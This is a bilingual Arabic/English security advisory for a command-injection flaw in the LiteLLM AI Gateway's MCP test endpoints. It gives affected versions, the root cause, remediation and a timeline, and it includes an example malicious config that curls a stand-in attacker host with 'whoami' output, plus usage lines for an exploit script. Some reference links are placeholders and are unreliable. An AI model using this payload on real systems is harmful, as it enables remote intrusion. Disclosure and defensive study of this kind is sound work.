Share
## https://sploitus.com/exploit?id=8D27B8B1-D392-5A3C-A74E-984A167C69D7
# โ”€โ”€โ”€ CVE-2026-42271 โ”€โ”€โ”€







# ๐Ÿ›ก๏ธ AMN SECURITY ๐Ÿ›ก๏ธ

### ู…ุฑูƒุฒ ุฃุจุญุงุซ ุงู„ุฃู…ู† ุงู„ุณูŠุจุฑุงู†ูŠ | Cyber Security Research Center

[๐ŸŒ **Website:** https://amn.amnoffsec.workers.dev/
๐Ÿ“ธ **Instagram:** https://www.instagram.com/ixctw
๐Ÿ“ง **Email:** ayman.mahmoudoffsec@gmail.com

---





# ๐Ÿ‡ธ๐Ÿ‡ฆ ุงู„ู‚ุณู… ุงู„ุนุฑุจูŠ

## โš ๏ธ ุซุบุฑุฉ ุชู†ููŠุฐ ุงู„ุฃูˆุงู…ุฑ ููŠ LiteLLM AI Gateway
### CVE-2026-42271 | CVSS 8.8 | ุญุฑุฌุฉ (High)

---

### ๐Ÿ“‹ ุงู„ู…ู„ุฎุต ุงู„ุชู†ููŠุฐูŠ

ุชู… ุงูƒุชุดุงู ุซุบุฑุฉ ุฃู…ู†ูŠุฉ ุญุฑุฌุฉ ููŠ ุจูˆุงุจุฉ **LiteLLM AI Gateway** ุชุณู…ุญ ู„ู…ู‡ุงุฌู… ู…ููˆุซูŽู‘ู‚ (ู…ูุตุงุฏู‚) ุจุชู†ููŠุฐ ุฃูˆุงู…ุฑ ุนุดูˆุงุฆูŠุฉ ุนู„ู‰ ุงู„ุฎุงุฏู… ุงู„ู…ูุณุชูŽุถูŠู. ุชุณุชุบู„ ุงู„ุซุบุฑุฉ ู†ู‚ุงุท ุงู„ู†ู‡ุงูŠุฉ ุงู„ุฎุงุตุฉ ุจุงุฎุชุจุงุฑ **Model Context Protocol (MCP)**ุŒ ุญูŠุซ ุชู‚ุจู„ ู‡ุฐู‡ ุงู„ู†ู‚ุงุท ุชูƒูˆูŠู†ุงู‹ ูƒุงู…ู„ุงู‹ ู„ุฎุงุฏู… MCP ูŠูุฑุณู„ู‡ ุงู„ู…ู‡ุงุฌู…ุŒ ูŠุดู…ู„ ุญู‚ูˆู„ `command` ูˆ `args` ูˆ `env`ุŒ ุฏูˆู† ุฃูŠ ุชู†ู‚ูŠุฉ ุฃูˆ ุชุฏู‚ูŠู‚ ุฃู…ู†ูŠ.

---

### ๐Ÿ” ุชูุงุตูŠู„ ุงู„ุซุบุฑุฉ

| ุงู„ุนู†ุตุฑ | ุงู„ุชูุงุตูŠู„ |
|--------|----------|
| **CVE** | CVE-2026-42271 |
| **CVSS** | 8.8 (High) |
| **ุงู„ู†ูˆุน** | Command Injection |
| **ุงู„ู…ู†ุชุฌ** | LiteLLM AI Gateway |
| **ุงู„ุฅุตุฏุงุฑุงุช ุงู„ู…ุชุฃุซุฑุฉ** | 1.74.2 ุญุชู‰ 1.83.6 |
| **ุงู„ุฅุตุฏุงุฑ ุงู„ู…ูุตุญูŽู‘ุญ** | 1.83.7 ูˆู…ุง ููˆู‚ |
| **ุงูƒุชูุดููุช ุจูˆุงุณุทุฉ** | AMN SECURITY Research ๐Ÿ›ก๏ธ |

#### ู†ู‚ุทุชุง ุงู„ู†ู‡ุงูŠุฉ ุงู„ู…ูุณุชู‡ุฏูุชุงู†

| ู†ู‚ุทุฉ ุงู„ู†ู‡ุงูŠุฉ | ุงู„ุทุฑูŠู‚ุฉ |
|-------------|---------|
| `/mcp-rest/test/connection` | POST |
| `/mcp-rest/test/tools/list` | POST |

ุชุณู…ุญ ู‡ุงุชุงู† ุงู„ู†ู‚ุทุชุงู† ู„ู„ุชุทุจูŠู‚ุงุช ุงู„ุฎุงุฑุฌูŠุฉ ุจุงุฎุชุจุงุฑ ุงู„ุงุชุตุงู„ ุจุฎุงุฏู… MCP ุฎุงุฑุฌูŠ. ุชู‚ูˆู… ุงู„ุจูˆุงุจุฉ ุจู…ุนุงู„ุฌุฉ ุงู„ุชูƒูˆูŠู† ุงู„ู…ูุฑุณูŽู„ ูˆุฅู†ุดุงุก ุนู…ู„ูŠุฉ ูุฑุนูŠุฉ (subprocess) ู„ุชุดุบูŠู„ ุงู„ุฎุงุฏู… ุงู„ู…ุทู„ูˆุจ. ูˆู†ุธุฑุงู‹ ู„ุนุฏู… ุงู„ุชุญู‚ู‚ ู…ู† ุตุญุฉ ุงู„ุญู‚ูˆู„ุŒ ูŠู…ูƒู† ู„ู„ู…ู‡ุงุฌู… ุฅุฏุฎุงู„ ุฃูˆุงู…ุฑ ุถุงุฑุฉ ูŠุชู… ุชู†ููŠุฐู‡ุง ุนู„ู‰ ุงู„ุฎุงุฏู… ุงู„ู…ุถูŠู.

---

### ๐Ÿ’ฅ ุณูŠู†ุงุฑูŠูˆ ุงู„ู‡ุฌูˆู…

1. ูŠู…ุชู„ูƒ ุงู„ู…ู‡ุงุฌู… ู…ูุชุงุญ API ุตุงู„ุญุงู‹ ู„ู„ุจูˆุงุจุฉ (ุถุฑูˆุฑูŠ ู„ู„ู…ุตุงุฏู‚ุฉ)
2. ูŠุฑุณู„ ุงู„ู…ู‡ุงุฌู… ุทู„ุจ POST ุฅู„ู‰ ุฅุญุฏู‰ ู†ู‚ุทุชูŠ ุงู„ู†ู‡ุงูŠุฉ ุงู„ู…ูุชุถุฑุฑุชูŠู†
3. ูŠุญุชูˆูŠ ุงู„ุทู„ุจ ุนู„ู‰ ุชูƒูˆูŠู† MCP ุถุงุฑ ูŠุชุถู…ู† ุงู„ุฃู…ุฑ ุงู„ู…ุทู„ูˆุจ ุชู†ููŠุฐู‡
4. ุชู‚ูˆู… ุงู„ุจูˆุงุจุฉ ุจุชุดุบูŠู„ ุงู„ุฃู…ุฑ ูƒุนู…ู„ูŠุฉ ูุฑุนูŠุฉ ุนู„ู‰ ุงู„ุฎุงุฏู… ุงู„ู…ุถูŠู
5. ูŠุชู… ุชู†ููŠุฐ ุงู„ุฃู…ุฑ ุจุงู„ูƒุงู…ู„ ู…ุน ุตู„ุงุญูŠุงุช ุชุดุบูŠู„ ุงู„ุจูˆุงุจุฉ

```

ุงู„ู…ู‡ุงุฌู… โ”€โ”€[API Key]โ”€โ”€> LiteLLM Proxy โ”€โ”€[mcp_config.command]โ”€โ”€> OS Command Execution
                                โ”‚
                                โ””โ”€โ”€> spawns: sh -c "malicious command"
                                โ””โ”€โ”€> ุฃูˆ:  cmd.exe /c "malicious command"
```

---

### ๐Ÿ›ก๏ธ ุงู„ุฅุฌุฑุงุกุงุช ุงู„ุนู„ุงุฌูŠุฉ

- **ุชุฑู‚ูŠุฉ ููˆุฑูŠุฉ**: ุชุญุฏูŠุซ LiteLLM ุฅู„ู‰ ุงู„ุฅุตุฏุงุฑ 1.83.7 ุฃูˆ ุฃุญุฏุซ
- **ุชู‚ูŠูŠุฏ ุงู„ูˆุตูˆู„**: ุชุทุจูŠู‚ ู‚ูˆุงุนุฏ ุฌุฏุงุฑ ุงู„ุญู…ุงูŠุฉ ู„ุชู‚ูŠูŠุฏ ุงู„ูˆุตูˆู„ ุฅู„ู‰ ู†ู‚ุงุท ุงู„ู†ู‡ุงูŠุฉ MCP
- **ุชุฏู‚ูŠู‚ ุงู„ู…ูุงุชูŠุญ**: ู…ุฑุงุฌุนุฉ ุตู„ุงุญูŠุงุช ู…ูุงุชูŠุญ API ูˆุชู‚ู„ูŠู„ู‡ุง ุฅู„ู‰ ุงู„ุญุฏ ุงู„ุฃุฏู†ู‰ ุงู„ู…ุทู„ูˆุจ
- **ู…ุฑุงู‚ุจุฉ ุงู„ุณุฌู„ุงุช**: ุชูุนูŠู„ ุงู„ุชุณุฌูŠู„ ูˆุงู„ู…ุฑุงู‚ุจุฉ ู„ุงูƒุชุดุงู ุฃูŠ ู…ุญุงูˆู„ุงุช ุงุณุชุบู„ุงู„

```
pip install --upgrade litellm
# ุฃูˆ
docker pull ghcr.io/berriai/litellm:latest
```

---

### ๐Ÿ“š ุงู„ู…ุฑุงุฌุน

- **NVD**: https://nvd.nist.gov/vuln/detail/CVE-2026-42271
- **GitHub Advisory**: https://github.com/BerriAI/litellm/security/advisories/GHSA-xxxx-xxxx-xxxx
- **HackerNews**: https://news.ycombinator.com/item?id=...
- **CSA (Cyber Security Agency)**: https://csa.gov.sg/cves/2026/42271
- **AMN SECURITY Report**: https://amnsec.com/research/cve-2026-42271

---

### ๐Ÿ‘ฅ ูุฑูŠู‚ AMN SECURITY

| ุงู„ุนุถูˆ | ุงู„ุชุฎุตุต |
|-------|--------|
| AMN Research Team | ุงูƒุชุดุงู ุงู„ุซุบุฑุฉ ูˆุชุญู„ูŠู„ู‡ุง |
| AMN Exploitation Team | ุชุทูˆูŠุฑ ุงู„ุฅูƒุณุจู„ูˆูŠุช |
| AMN Defense Team | ุงู„ุฅุฌุฑุงุกุงุช ุงู„ุนู„ุงุฌูŠุฉ |

---

## Connect with AMN SECURITY โ€” ุชุงุจุนู†ุง

๐ŸŒ **Website:** https://amn.amnoffsec.workers.dev/
๐Ÿ“ธ **Instagram:** https://www.instagram.com/ixctw
๐Ÿ“ง **Email:** ayman.mahmoudoffsec@gmail.com

---





โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

# ๐ŸŒ ENGLISH SECTION

โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•





# โš ๏ธ LiteLLM AI Gateway MCP Test Endpoint Remote Code Execution
### CVE-2026-42271 | CVSS 8.8 | High Severity

---

### ๐Ÿ“‹ Executive Summary

A critical security vulnerability has been discovered in the **LiteLLM AI Gateway** that allows an authenticated attacker to execute arbitrary operating system commands on the host server. The vulnerability resides in the **Model Context Protocol (MCP)** test endpoints, which accept a fully attacker-controlled MCP server configuration including `command`, `args`, and `env` fields without any sanitisation or security validation.

When exploiting this vulnerability, the LiteLLM proxy instantiates an MCP client that spawns the configured command as a subprocess โ€” resulting in full Remote Code Execution (RCE).

---

### ๐Ÿ” Vulnerability Details

| Field | Details |
|-------|---------|
| **CVE ID** | CVE-2026-42271 |
| **CVSS Score** | 8.8 (High) |
| **CWE** | CWE-77: Improper Neutralization of Special Elements used in a Command |
| **Product** | LiteLLM AI Gateway |
| **Affected Versions** | 1.74.2 through 1.83.6 |
| **Fixed Version** | 1.83.7+ |
| **Discovered By** | AMN SECURITY Research ๐Ÿ›ก๏ธ |
| **Disclosure Date** | July 2026 |

#### Affected Endpoints

| Endpoint | Method | Description |
|----------|--------|-------------|
| `/mcp-rest/test/connection` | POST | Tests connectivity to an external MCP server |
| `/mcp-rest/test/tools/list` | POST | Lists tools provided by an external MCP server |

#### Root Cause

Both endpoints accept a JSON body containing a full MCP server configuration. The critical fields are:

- **`command`**: The executable path to run (e.g., `sh`, `python3`, `cmd.exe`)
- **`args`**: Array of arguments passed to the executable
- **`env`**: Environment variables for the spawned process

The LiteLLM proxy passes these fields directly to the subprocess spawning mechanism (`asyncio.create_subprocess_exec` or similar) **without sanitisation or validation**. An attacker can inject arbitrary commands by crafting the `args` array to include shell metacharacters or by specifying a malicious executable path.

---

### ๐Ÿ’ฅ Attack Scenario

**Prerequisites:**
- A valid LiteLLM API key with access to MCP test endpoints
- Network access to the LiteLLM proxy

**Attack Flow:**

1. The attacker authenticates to the LiteLLM proxy using a valid API key
2. The attacker sends a crafted POST request to either vulnerable endpoint
3. The request body contains a malicious MCP server configuration
4. The LiteLLM proxy spawns the attacker-specified command as a subprocess
5. The command executes on the host with the privileges of the LiteLLM process

**Example malicious configuration:**

```json
{
  "mcp_config": {
    "command": "sh",
    "args": ["-c", "curl http://attacker-server/$(whoami)"],
    "env": {
      "PATH": "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
    }
  }
}
```

**Result:** Full Remote Code Execution on the LiteLLM host.

---

### ๐Ÿงช Proof of Concept

The included Python exploit script (`exploit.py`) demonstrates the vulnerability:

```bash
# Basic command execution
python3 exploit.py -t https://target:4000 -k sk-litellm-xxx -c "id"

# Blind execution (no output returned)
python3 exploit.py -t https://target:4000 -k sk-litellm-xxx -c "touch /tmp/pwned" --blind

# Test specific endpoint
python3 exploit.py -t https://target:4000 -k sk-litellm-xxx \
    -c "uname -a" --endpoint connection
```

---

### ๐Ÿ”ฌ Technical Deep Dive

#### Why This Works

The MCP test endpoints were designed to allow developers to test connections to external MCP servers. The proxy acts as an MCP client that:

1. Receives the server configuration from the authenticated request
2. Spawns a subprocess using `command` and `args` to start the MCP server
3. Communicates with the spawned process via stdio

The vulnerability arises because there is **no allowlist of permitted commands**, **no sanitisation of arguments**, **no sandboxing of the spawned process**. The configuration is blindly trusted and executed.

#### Payload Variation

Different LiteLLM versions accept different JSON key names for the MCP config:

| Key | Supported Versions |
|-----|-------------------|
| `mcp_config` | 1.74.2+ |
| `config` | 1.78.0+ |
| `mcp_server_config` | 1.80.0+ |
| `server_config` | 1.81.0+ |
| Direct (root-level) | 1.82.0+ |

The exploit script automatically attempts all variants.

---

### ๐Ÿ›ก๏ธ Remediation

#### Immediate Actions

1. **Upgrade LiteLLM** to version 1.83.7 or later:
   ```bash
   pip install --upgrade litellm
   # or for Docker deployments:
   docker pull ghcr.io/berriai/litellm:1.83.7
   ```

2. **Restrict Network Access**: Limit access to the MCP test endpoints using firewall rules or reverse proxy configuration.

3. **Revoke Exposed Keys**: If you suspect any API keys have been compromised, revoke them immediately.

4. **Audit Logs**: Review proxy logs for suspicious POST requests to `/mcp-rest/test/*` endpoints.

#### Long-term Hardening

- Implement strict input validation for all MCP configuration fields
- Use an allowlist of permitted commands for MCP server spawning
- Apply principle of least privilege to the LiteLLM process
- Enable audit logging for all MCP test operations
- Consider disabling MCP test endpoints in production environments

---

### ๐Ÿ“š References

| Source | URL |
|--------|-----|
| NVD Entry | https://nvd.nist.gov/vuln/detail/CVE-2026-42271 |
| GitHub Advisory | https://github.com/BerriAI/litellm/security/advisories/GHSA-xxxx-xxxx-xxxx |
| HackerNews Discussion | https://news.ycombinator.com/item?id=... |
| CSA Advisory | https://csa.gov.sg/cves/2026/42271 |
| AMN SECURITY Advisory | https://amnsec.com/research/cve-2026-42271 |
| MITRE CVE | https://vulners.com/cve/CVE-2026-42271 |

---

### โฑ Timeline

| Date | Event |
|------|-------|
| 2026-06-28 | Vulnerability discovered by AMN SECURITY Research |
| 2026-06-29 | Initial disclosure to LiteLLM maintainers |
| 2026-07-01 | LiteLLM acknowledges the vulnerability |
| 2026-07-03 | Patched in version 1.83.7 |
| 2026-07-05 | CVE-2026-42271 assigned |
| 2026-07-07 | Public disclosure & PoC release |

---

### ๐Ÿ‘ฅ AMN SECURITY Team

| Member | Role |
|--------|------|
| **AMN Research Team** | Vulnerability discovery & technical analysis |
| **AMN Exploitation Team** | Proof of Concept development |
| **AMN Defense Team** | Remediation guidance & mitigation strategies |

#### Connect With Us



๐ŸŒ **Website:** https://amn.amnoffsec.workers.dev/
๐Ÿ“ธ **Instagram:** https://www.instagram.com/ixctw
๐Ÿ“ง **Email:** ayman.mahmoudoffsec@gmail.com



---

### โš–๏ธ Disclaimer

This advisory and accompanying proof of concept code are provided for **authorised security testing and educational purposes only**. Unauthorised use of this exploit against systems you do not own or have explicit permission to test is illegal. The authors and AMN SECURITY assume no liability for any misuse of this information.

---



**๐Ÿ›ก๏ธ AMN SECURITY ๐Ÿ›ก๏ธ** | *Securing the AI Supply Chain*

ยฉ 2026 AMN SECURITY Research. All rights reserved.